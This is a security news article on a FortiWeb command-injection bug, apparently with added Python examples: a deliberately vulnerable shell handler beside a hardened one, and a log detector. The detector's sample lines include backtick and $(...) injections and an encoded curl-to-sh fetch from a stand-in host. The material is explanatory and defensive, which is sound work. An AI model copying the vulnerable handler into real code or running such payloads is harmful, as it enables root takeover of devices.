The OS command-injection bug in Fortinet’s web application firewall (WAF) platform, Forti Web, will now get a patch this week.
UPDATED – 18.00 – 18-08-2021
An as-yet-unpatched OS command-injection vulnerability has been disclosed in Fortinet’s web application firewall (WAF) platform, Forti Web. It could allow privilege escalation & full device takeover, researchers stated.
Unknown Vulnerabilities
Forti Web is a cyber-security defence platform aimed at protecting business-critical web applications from attacks that target known & unknown vulnerabilities. The firewall is built to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.
The bug (CVE pending) exists in the Forti Web management interface (version 6.3.11 & prior) & carries a CVSSv3 base score of 8.7 out of 10, making it high severity. It allows a remote, authenticated attacker to execute arbitrary commands on the underlying system via the SAML server configuration page, according to Rapid7 researcher William Vu, who discovered the bug.
“Note that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as CVE-2020-29015,” according to a Tues. write-up on the issue.
Server Configuration
Once authenticated to the management interface of the Forti Web device, an attacker can smuggle commands using backticks in the “Name” field of the SAML Server configuration page. Backticks are command substitution to a shell, so whatever is placed between them runs when the name reaches a shell command line, & it runs as the root user of the underlying operating system.
“An attacker can use this vulnerability to take complete control of the affected device, with the highest possible privileges,” according to the writeup. “They might install a persistent shell, crypto mining software, or other malicious software.”
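The vulnerable pattern the article describes, as an added Python example that is neither the Rapid7 proof-of-concept nor Fortinet code: a form handler that interpolates a SAML server name into a shell command line, next to a hardened version that allow-lists the name and invokes the program with an argv list and no shell. The allow-list regex, the use of `echo` as the stand-in command and both input strings are constructed for illustration; the appliance's real handler and its validation rules are not published on the page.

```python
import re
import subprocess

# Constructed inputs (not taken from the Rapid7 write-up): a benign SAML server
# name and one that smuggles a command in backticks, as the article describes.
BENIGN_NAME = "corp-idp"
INJECTED_NAME = "corp-idp`echo INJECTED`"

# Hypothetical allow-list for a SAML server display name. The real product's
# validation rules are not on the page; this is an assumption for the example.
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def vulnerable_register(name: str) -> str:
    """Anti-pattern: the user-controlled name is pasted into a shell command.

    Wrapping the value in double quotes does NOT neutralise backticks or
    $(...): the shell performs command substitution inside double quotes, so
    whatever the attacker placed between backticks executes with the
    privileges of this process (root on the appliance, per the article).
    """
    cmd = f'echo "registering saml server {name}"'
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def hardened_register(name: str) -> str:
    """Reject anything outside the allow-list, then call the program with an
    argv list and shell=False so the name is a single literal argument and no
    shell ever parses it."""
    if not NAME_RE.fullmatch(name):
        raise ValueError(f"invalid SAML server name: {name!r}")
    proc = subprocess.run(
        ["echo", "registering saml server", name],
        shell=False, capture_output=True, text=True,
    )
    return proc.stdout.strip()


def demo() -> dict:
    """Run both handlers over the constructed inputs and report the outcome."""
    results = {
        "vulnerable_benign": vulnerable_register(BENIGN_NAME),
        "vulnerable_injected": vulnerable_register(INJECTED_NAME),
        "hardened_benign": hardened_register(BENIGN_NAME),
    }
    try:
        hardened_register(INJECTED_NAME)
        results["hardened_injected"] = "accepted"
    except ValueError:
        results["hardened_injected"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The injected input makes the vulnerable handler print `corp-idpINJECTED`: the `echo INJECTED` inside the backticks ran, even though the value sat inside double quotes. The hardened handler rejects it before any process is spawned; if a shell were genuinely unavoidable, `shlex.quote()` on the value would be the fallback, but an argv list with `shell=False` removes the parsing step that makes the injection possible.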
The damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could move into the wider network in that case. However, Rapid7 researchers identified fewer than 300 appliances that appeared to be exposed in this way.
Proof-of-Concept
In the analysis, Vu provided proof-of-concept exploit code consisting of an HTTP POST request & the corresponding response.
Because of the disclosure, Fortinet has sped up plans to release a fix for the problem in Forti Web 6.4.1: originally planned for the end of Aug., it will now be available by the end of the week.
“We are working to deliver immediate notification of a workaround to customers & a patch released by the end of the week,” it stated.
The firm also noted that Rapid7’s disclosure came as a surprise given vulnerability-disclosure norms in the industry.
Independent Security Researchers
“The security of our customers is always our 1st priority. Fortinet recognises the important role of independent security researchers who work closely with vendors to protect the cyber-security ecosystem in alignment with their responsible disclosure policies.
In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers.
As such, we had expected that Rapid7 would hold any findings prior to the end of the 90-day responsible-disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.”
Straightforward Advice
Rapid7 offered straightforward advice:
“In the absence of a patch, users are advised to disable the Forti Web device’s management interface from untrusted networks, which would include the internet,” according to Rapid7.
“Generally speaking, management interfaces for devices like Forti Web should not be exposed directly to the internet anyway — instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.”
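Alongside restricting the management interface, a defender waiting for the patch can hunt the appliance's configuration audit trail for SAML server names that carry shell metacharacters, and flag changes that came from outside the management networks. The following is an added Python example, not Rapid7's or Fortinet's code. The key=value log layout, the sample lines and the trusted management subnets are all constructed assumptions; the page does not show the appliance's real log format.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed, hypothetical audit lines. The real appliance log format is not
# on the page; this layout exists only so the detection logic has input.
SAMPLE_AUDIT_LOG = """\
2021-08-18T09:12:01Z user=admin src=10.20.0.15 action=config-change object=saml-server name="corp-idp"
2021-08-18T09:14:40Z user=admin src=203.0.113.7 action=config-change object=saml-server name="corp-idp`id`"
2021-08-18T09:15:02Z user=admin src=198.51.100.9 action=config-change object=saml-server name="idp%60curl%20http%3A%2F%2Fexample.invalid%2Fx%7Csh%60"
2021-08-18T09:16:11Z user=ops src=10.0.0.5 action=config-change object=server-pool name="pool $(hostname)"
2021-08-18T09:18:30Z user=ops src=10.0.0.5 action=config-change object=saml-server name="backup-idp-2"
"""

# Assumed management networks; an explicit allow-list is used rather than
# ipaddress.is_private, because the documentation ranges used above
# (203.0.113.0/24, 198.51.100.0/24) also count as "private" in that API.
TRUSTED_MGMT_NETS = [ipaddress.ip_network("10.0.0.0/8")]

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) action=(?P<action>\S+) '
    r'object=(?P<obj>\S+) name="(?P<name>.*)"$'
)
# Shell metacharacters that let an interpolated value run extra commands:
# command substitution (backticks, $(...)), command separators and pipes.
SHELL_META_RE = re.compile(r"`|\$\(|;|\||&|\n|\r")


def parse_line(line: str):
    """Return the fields of one audit line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def from_trusted_network(src: str) -> bool:
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in TRUSTED_MGMT_NETS)


def find_suspicious(log_text: str) -> list:
    """Flag config changes whose object name contains shell metacharacters."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["action"] != "config-change":
            continue
        # Decode once so percent-encoded metacharacters (%60 is a backtick)
        # are not missed; the decoded string is what the form handler sees.
        decoded = unquote(rec["name"])
        meta = sorted(set(SHELL_META_RE.findall(decoded)))
        if not meta:
            continue
        findings.append({
            "ts": rec["ts"],
            "user": rec["user"],
            "src": rec["src"],
            "object": rec["obj"],
            "decoded_name": decoded,
            "metachars": meta,
            # Management access from outside the trusted networks is the
            # exposure the article warns about.
            "from_untrusted_network": not from_trusted_network(rec["src"]),
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_AUDIT_LOG):
        print(f)
```

Over the constructed lines this flags three events: the plain backtick payload, the percent-encoded one (which a naive grep for a literal backtick would miss), and a `$(...)` substitution in a different object, since the same bug class is not specific to one form field. The two events from 203.0.113.7 and 198.51.100.9 are also marked as coming from outside the assumed management networks.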
The Rapid7 researchers explained that the vulnerability appears to be related to CVE-2021-22123, which was patched in June.
Popular for Exploit
The vendor is no stranger to security bugs in its platforms, & Fortinet products are popular exploitation avenues for cyber-attackers, including nation-state players. Users should prepare to patch quickly.
In April, the FBI & the US Cyber-security & Infrastructure Security Agency (CISA) warned that various advanced persistent threats (APTs) were actively exploiting 3 security vulnerabilities in the Fortinet SSL VPN for espionage.
Gain a Foothold
Exploits for CVE-2018-13379, CVE-2019-5591 & CVE-2020-12812 were being used to gain a foothold within networks before moving laterally & carrying out reconnaissance, they warned.
One of those bugs, in Forti OS, was also seen being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.